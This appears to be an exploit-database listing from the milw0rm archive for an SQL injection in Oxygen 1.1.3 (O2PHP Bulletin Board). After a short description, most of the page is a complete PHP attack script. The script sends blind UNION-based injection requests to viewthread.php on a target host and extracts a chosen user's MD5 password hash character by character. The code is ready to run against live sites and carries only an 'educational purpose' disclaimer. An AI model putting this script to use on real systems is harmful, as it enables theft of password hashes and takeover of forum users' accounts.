header-logo
Suggest Exploit
vendor:
Bulletin Board
by:
DarkFig
6,5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Bulletin Board
Affected Version From: Oxygen <= 1.1.3
Affected Version To: Oxygen <= 1.1.3
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Oxygen <= 1.1.3 (O2PHP Bulletin Board) SQL Injection

A vulnerability in Oxygen <= 1.1.3 (O2PHP Bulletin Board) allows an attacker to inject arbitrary SQL commands via the 'viewthread.php' script. This can be exploited to manipulate SQL queries by e.g. injecting arbitrary 'uid' values. This can be exploited to disclose the MD5 hash of a user's password.

Mitigation:

N/A
Source

Exploit-DB raw data:

#!/usr/bin/php
<?

if($argc<4){
 print("
 -------------------------------------------------------
 Affected.scr..: Oxygen <= 1.1.3 (O2PHP Bulletin Board)
 Poc.ID........: 14061118
 Type..........: SQL Injection
 Risk.level....: Medium
 Conditions....: register_globals = on
 Src.download..: download.o2php.com
 Poc.link......: acid-root.new.fr/poc/14061118.txt
 Credits.......: DarkFig
 Note..........: FOR EDUCATIONAL PURPOSE ONLY
 -------------------------------------------------------
 Usage.........: php 14061118.txt <host> <path> <userid>
 -------------------------------------------------------\n");
 exit(1);
}

print "\n Please be patient (max=736 hits)...\n MD5: ";
$host = !preg_match("/^http:\/\/(\S*)/",$argv[1],$hwttp) ? $argv[1] : $hwttp[1];
$path = $argv[2];
$usid = intval($argv[3]);
$tabl = "o2_members";

for($x=1;  $x<=32; $x++) {
for($y=48; $y<=71; $y++) {

$recv  = '';
$sqli  = "%20UNION%20SELECT%201,1%20FROM%20".$tabl."%20WHERE%20uid=".$usid."%20AND%20substr(password,".$x.",1)=char(".$y.")%23";
$data  = "GET ".$path."viewthread.php?tid=1&pid=-1".$sqli." HTTP/1.1 \r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n\r\n";

if(!$sock  = @fsockopen($host, 80)) die("Connection problem\n");
fputs($sock, $data);

while(!feof($sock)) $recv .= fgets($sock);
fclose($sock);

if(preg_match("/Location: viewthread.php/", $recv)) {
  print strtolower(chr($y));
  break;
} elseif($y == 71) {
  print "Not vulnerable\n";
  exit(1);

}}}

print "\n";
exit(0);

?>

# milw0rm.com [2006-11-18]

Navigation

Suggest Exploit

Services By CQR